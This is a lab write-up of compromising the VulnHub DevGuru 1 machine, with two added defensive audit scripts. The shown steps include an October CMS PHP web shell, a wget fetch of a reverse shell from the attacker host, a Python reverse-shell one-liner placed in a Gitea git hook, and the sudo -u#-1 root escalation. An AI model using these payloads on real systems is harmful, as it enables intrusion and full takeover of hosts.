# DevGuru 1

> <https://download.vulnhub.com/devguru/devguru.ova.7z>

Target IP: `192.168.32.224`

Scan the exposed ports and services

```
┌──(root💀kali)-[~/Desktop]
└─# nmap -p 1-65535 -sV  192.168.32.224
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-11 01:23 EDT
Nmap scan report for 192.168.32.224
Host is up (0.00096s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
8585/tcp open  unknown
```

Visit port 80

![image-20220911132521914](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-a0a3fcdbd13cfab0725f7a3b3898781dab82b51e%2Fimage-20220911132521914.png?alt=media)

Brute-force directories

```
┌──(root💀kali)-[/tmp]
└─# dirb http://192.168.32.224/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Sep 11 01:25:29 2022
URL_BASE: http://192.168.32.224/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.32.224/ ----
+ http://192.168.32.224/.git/HEAD (CODE:200|SIZE:23)
+ http://192.168.32.224/.htaccess (CODE:200|SIZE:1678)
+ http://192.168.32.224/0 (CODE:200|SIZE:12674)
+ http://192.168.32.224/about (CODE:200|SIZE:18666)
+ http://192.168.32.224/About (CODE:200|SIZE:18666)
+ http://192.168.32.224/backend (CODE:302|SIZE:414)
==> DIRECTORY: http://192.168.32.224/config/
+ http://192.168.32.224/index.php (CODE:200|SIZE:12724)
==> DIRECTORY: http://192.168.32.224/modules/
==> DIRECTORY: http://192.168.32.224/plugins/
+ http://192.168.32.224/services (CODE:200|SIZE:10038)
+ http://192.168.32.224/Services (CODE:200|SIZE:10038)
==> DIRECTORY: http://192.168.32.224/storage/
==> DIRECTORY: http://192.168.32.224/themes/
==> DIRECTORY: http://192.168.32.224/vendor/

---- Entering directory: http://192.168.32.224/config/ ----

---- Entering directory: http://192.168.32.224/modules/ ----
==> DIRECTORY: http://192.168.32.224/modules/backend/
==> DIRECTORY: http://192.168.32.224/modules/cms/
==> DIRECTORY: http://192.168.32.224/modules/system/

```

Visit `/.git/HEAD`

![image-20220911133800456](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-fa337f6beedc3d9ee52b0ce823a849d40fd37775%2Fimage-20220911133800456.png?alt=media)

Use [git-dumper](https://github.com/arthaud/git-dumper) to dump the whole git repository

```
┌──(root💀kali)-[/opt/git-dumper]
└─# python3 git_dumper.py  http://192.168.32.224 /tmp/sources
```

![QQ录屏20220911134103](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-c01406d1f020e71a5503a1b7bc6361caeb37be55%2FQQ%E5%BD%95%E5%B1%8F20220911134103.gif?alt=media)

Visit `/adminer.php`; it asks for database connection details.

![image-20220911134719207](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-b8f40694d4eef0ecd1a87d6dc0eb5e5a7c64cfc8%2Fimage-20220911134719207.png?alt=media)

Look at the database connection file in the dumped source

```
┌──(root💀kali)-[/tmp/sources]
└─# cat config/database.php


'mysql' => [
            'driver'     => 'mysql',
            'engine'     => 'InnoDB',
            'host'       => 'localhost',
            'port'       => 3306,
            'database'   => 'octoberdb',
            'username'   => 'october',
            'password'   => 'SQ66EBYx4GT3byXH',
            'charset'    => 'utf8mb4',
            'collation'  => 'utf8mb4_unicode_ci',
            'prefix'     => '',
            'varcharmax' => 191,
        ],
```
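The two findings above, a reachable `.git/` directory that git-dumper can reconstruct and an `adminer.php` sitting next to the application (with `config/database.php` in the dump handing over the credentials it needs), are both deployment-hygiene failures. The script below is an added example for this write-up, not part of the original post, October CMS or Adminer; it walks a document root and flags the artifacts this walkthrough relies on (exposed git metadata, a database admin front end, backup copies of files and dotenv files), so a defender can catch them before the box goes live. The rule list and the sample tree it builds are constructed for the demo.

```python
#!/usr/bin/env python3
"""Audit a web document root for files that must never be reachable over HTTP.

Added example for this write-up; not part of the original post, October CMS or
Adminer. The rules and the sample tree are constructed for the demo.
"""
import os
import re
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

# (reason, regex tested against the '/'-separated path relative to the document root)
RULES: List[Tuple[str, re.Pattern]] = [
    ("git repository reachable from the web (dumpable with git-dumper)",
     re.compile(r"(^|/)\.git$")),
    ("database administration script deployed next to the application",
     re.compile(r"(^|/)adminer(-[\w.]+)?\.php$|(^|/)phpmyadmin$", re.I)),
    ("backup or editor copy of a file (often a config file with credentials)",
     re.compile(r"\.(bak|old|orig|swp|save)$|~$", re.I)),
    ("dotenv file with secrets inside the document root",
     re.compile(r"(^|/)\.env(\..+)?$")),
]


def _match(rel_path: str) -> Optional[str]:
    """Return the reason of the first rule matching `rel_path`, or None."""
    for reason, pattern in RULES:
        if pattern.search(rel_path):
            return reason
    return None


def audit_webroot(root: str) -> List[Tuple[str, str]]:
    """Walk `root` and return sorted (relative_path, reason) pairs for every hit.

    A matching directory (such as `.git`) is reported once and not descended
    into, so the report lists the problem rather than every object inside it.
    """
    findings: List[Tuple[str, str]] = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        prefix = "" if rel_dir == "." else rel_dir.replace(os.sep, "/") + "/"
        for name in list(dirnames):
            reason = _match(prefix + name)
            if reason:
                findings.append((prefix + name, reason))
                dirnames.remove(name)  # prune: one finding per offending directory
        for name in filenames:
            reason = _match(prefix + name)
            if reason:
                findings.append((prefix + name, reason))
    return sorted(findings)


def build_demo_tree() -> str:
    """Create a constructed document root that mirrors the walkthrough's findings."""
    root = tempfile.mkdtemp(prefix="webroot-demo-")
    for rel in ("index.php", ".htaccess", "themes/demo/pages/home.htm",
                ".git/HEAD", ".git/objects/ab/cdef", "adminer.php",
                "config/app.ini.bak"):
        path = Path(root, rel)
        path.parent.mkdir(parents=True, exist_ok=True)
        path.write_text("placeholder\n")
    return root


if __name__ == "__main__":
    demo_root = build_demo_tree()
    for rel, reason in audit_webroot(demo_root):
        print(f"{rel:30} {reason}")
```

Run it against a real document root instead of the demo tree (`audit_webroot("/var/www/html")`) as a pre-deployment check; on this box it would have reported the `.git` directory and `adminer.php` before the first nmap scan ever reached them.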

Login succeeded

![image-20220911134800481](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-6d7df538e6972246a1b942848ee57f4f2fccf95d%2Fimage-20220911134800481.png?alt=media)

In the `backend_users` table I saw the record for the user "`frank`", found the password stored as a bcrypt hash, and saw that the record can be modified via the Edit tab.

![image-20220911143536787](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-abcbdca6d1a1f97e70e015cb5c16ae13bd6ff40f%2Fimage-20220911143536787.png?alt=media)

So I used <https://www.browserling.com/tools/bcrypt> to generate a bcrypt hash for a new password: **hack123**

```
$2a$10$EZqGJ5vfe6K9vtzmn9xPCOER/W0JwLkLzzUFFfmvsM2CKFxr9P4tm
```

Log in to the CMS with `frank/hack123`

![image-20220911143914144](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-ccda3d80568661d572f93ceab53614dc4dee0d4a%2Fimage-20220911143914144.png?alt=media)

![image-20220911144025287](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-65e2e1b4ba89f69df86c3ad68fd15c8d5b81b9f1%2Fimage-20220911144049714.png?alt=media)

I searched on Google and found a [link](https://octobercms.com/forum/post/running-php-code-on-pages) on exploiting October CMS by executing PHP code from a page, so I used the following:

```
{{ this.page.getShell }}
```

![image-20220911144531339](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-bc42149bdc07f1ef7669a3a015d2d93b69cd6faf%2Fimage-20220911144531339.png?alt=media)

Add the following method in the Code tab of the "`home.htm`" file:

```php
function onStart() {
	$this->page['getShell'] = system($_GET['cmd']);
}
```

![image-20220911144637827](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-a4ed0aead087c10ee40c553e24cd9ec35cc2569e%2Fimage-20220911144637827.png?alt=media)

Execute the shell: `http://192.168.32.224/?cmd=ls -la`

![image-20220911144755272](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-6c29ec59ea33febff92cb1fd25decb40badfcc68%2Fimage-20220911144755272.png?alt=media)

Download the reverse shell

```
192.168.32.224/?cmd=wget http://192.168.32.130/shell.php
```

We got the reverse connection; let's enumerate further. We found the **app.ini.bak** file in /var/backup.

![image-20220911145415804](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-90aacc3af66e241b0225dce6a501bba370258b4d%2Fimage-20220911145415804.png?alt=media)

Here we found another set of login credentials, for the `gitea` DB.

```
[database]
; Database to use. Either "mysql", "postgres", "mssql" or "sqlite3".
DB_TYPE             = mysql
HOST                = 127.0.0.1:3306
NAME                = gitea
USER                = gitea
; Use PASSWD = `your password` for quoting if you use special characters in the password.
PASSWD              = UfFPTF8C8jjxVF2m
```

So we log in to MySQL as `gitea:UfFPTF8C8jjxVF2m`

![image-20220911145710421](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-1c33f48c29d84f01e4416c1d1f90c8c0217c3129%2Fimage-20220911145710421.png?alt=media)

In the gitea DB, the `user` table contains `user:frank`; we change his password again.

![image-20220911145753626](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-131d9ff3fd84e087fcb470f8d5a47b234e453e39%2Fimage-20220911145753626.png?alt=media)

Now let's reuse the password hash generated above for the user Frank. So I edited the record for user frank and updated the table.

![image-20220911145901856](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-5cfd95c371b606e6a5419a7a33fc6b69562b4d9b%2Fimage-20220911145901856.png?alt=media)

Then I navigated to Gitea on port 8585 and logged in with those credentials

![image-20220911145953967](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-e01858b6042e333d4f0e1dee04210f77e37d916e%2Fimage-20220911145953967.png?alt=media)

Here we get the dashboard and find a link to `frank/devguru-website`.

![image-20220911150029521](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-64c1c875e7311a4c9267d06c6aa6674cfbcb05e1%2Fimage-20220911150029521.png?alt=media)

Click the Settings entry highlighted in the image.

![image-20220911150114626](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-214c3099f679292fefcd71045712aed2fd486a22%2Fimage-20220911150114626.png?alt=media)

Click **Git Hooks > pre-receive > Hook Content** and put the following Python reverse-shell code into the hook.

```
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.32.130",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```

![image-20220911150058942](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-f2650ee1dc7fb9d749021ba4b372afdea4c080f6%2Fimage-20220911150058942.png?alt=media)

![image-20220911150224444](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-adeb3bd2f3b680939c5e5ff976d1d7aaa5762785%2Fimage-20220911150224444.png?alt=media)

But the repository has to be updated for the Python code to run, so go back to the repository and open `README.md`.

Now edit the file by adding a few blank lines at the end and click Commit Changes; as soon as the commit goes through, the repository is updated and you get the reverse connection in the netcat session.

![QQ录屏20220911150411](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-d1b38d4c66d74e8c6ebb42c7c5c0a46ed7405467%2FQQ%E5%BD%95%E5%B1%8F20220911150411.gif?alt=media)

So we got the reverse connection, and we found the `user.txt` file, our first flag.

![image-20220911150559111](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-9a328c0a8ee61a80c2b1078a0cc74bdbd73c229d%2Fimage-20220911150559111.png?alt=media)

To escalate privileges we checked the sudo permissions and found that user frank can run sqlite3 with root privileges, and that the installed sudo version is also vulnerable.

![image-20220911150637333](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-5fac465dc186a652f68cbf93796fe2fbfd1e8965%2Fimage-20220911150637333.png?alt=media)

We found an exploit [here](https://www.exploit-db.com/exploits/47502). Then I ran the following command to get a root shell and read root.txt, our final flag.

```
sudo -u#-1 sqlite3 /dev/null '.shell /bin/bash'
```
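The bypass above only works when two conditions hold together, which is exactly what a defender should audit for. The script below is an added example for this write-up, not part of the original post or of sudo: it parses `sudo --version` output against 1.8.28 (the release that fixed CVE-2019-14287, the bug behind exploit 47502) and scans sudoers text for a runas list of the form `(ALL, !root)`, the rule shape that `-u#-1` sidesteps. The version strings and sudoers lines are constructed samples, not taken from the target (the write-up does not show the box's sudoers file).

```python
#!/usr/bin/env python3
"""Check a host for the sudo runas-user-ID -1 bypass (CVE-2019-14287, EDB-ID 47502).

Added example for this write-up; not part of the original post or of sudo.
The sample `sudo --version` output and sudoers lines below are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

FIXED_VERSION: Tuple[int, int, int] = (1, 8, 28)  # first sudo release with the fix

# runas list "ALL except root", written as (ALL, !root) or (ALL, !#0)
RUNAS_EXCLUDES_ROOT = re.compile(r"\(\s*ALL\s*,\s*!\s*(root|#0)\s*\)", re.IGNORECASE)


def parse_sudo_version(version_output: str) -> Optional[Tuple[int, ...]]:
    """Pull the numeric triple out of `sudo --version`: 'Sudo version 1.8.21p2' -> (1, 8, 21)."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", version_output)
    return tuple(int(x) for x in m.groups()) if m else None


def version_vulnerable(version: Tuple[int, ...]) -> bool:
    """True for any release older than 1.8.28; the patch-level suffix (p2) does not matter."""
    return version < FIXED_VERSION


def find_runas_not_root_rules(sudoers_text: str) -> List[str]:
    """Return sudoers lines that grant 'any user except root', the shape -u#-1 defeats."""
    hits: List[str] = []
    for line in sudoers_text.splitlines():
        stripped = line.strip()
        # skip blanks, comments and #include/#includedir directives
        if not stripped or stripped.startswith("#"):
            continue
        if RUNAS_EXCLUDES_ROOT.search(stripped):
            hits.append(stripped)
    return hits


def assess(version_output: str, sudoers_text: str) -> Dict[str, object]:
    """Combine both checks; the bypass needs the old version AND a matching rule."""
    version = parse_sudo_version(version_output)
    old = version is not None and version_vulnerable(version)
    rules = find_runas_not_root_rules(sudoers_text)
    return {
        "sudo_version": version,
        "version_vulnerable": old,
        "runas_not_root_rules": rules,
        "exploitable": old and bool(rules),
        "remediation": "upgrade sudo to 1.8.28 or newer; replace (ALL, !root) "
                       "with an explicit list of the runas users actually needed",
    }


# constructed samples (the write-up does not reproduce the target's sudoers file)
SAMPLE_VERSION_OLD = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"
SAMPLE_VERSION_NEW = "Sudo version 1.9.13p3\nSudoers policy plugin version 1.9.13p3\n"
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
frank   ALL=(ALL, !root) NOPASSWD: /usr/bin/sqlite3
%admin  ALL=(ALL) ALL
"""

if __name__ == "__main__":
    for label, out in (("old", SAMPLE_VERSION_OLD), ("new", SAMPLE_VERSION_NEW)):
        report = assess(out, SAMPLE_SUDOERS)
        print(f"sudo {report['sudo_version']} ({label}): exploitable={report['exploitable']}")
        for rule in report["runas_not_root_rules"]:
            print("  offending rule:", rule)
```

On a live host feed it the real outputs (`subprocess.run(["sudo", "--version"], ...)` and the contents of `/etc/sudoers` plus `/etc/sudoers.d/*`); the `(ALL, !root)` idiom is worth removing even after the upgrade, since a deny-list runas spec is easy to get wrong again.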

![image-20230208134605514](https://3435151113-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7n39F0laH6bbmYKdILcq%2Fuploads%2Fgit-blob-6be99431f054449af312f269293c0fbabbee57ab%2Fimage-20230208134605514.png?alt=media)
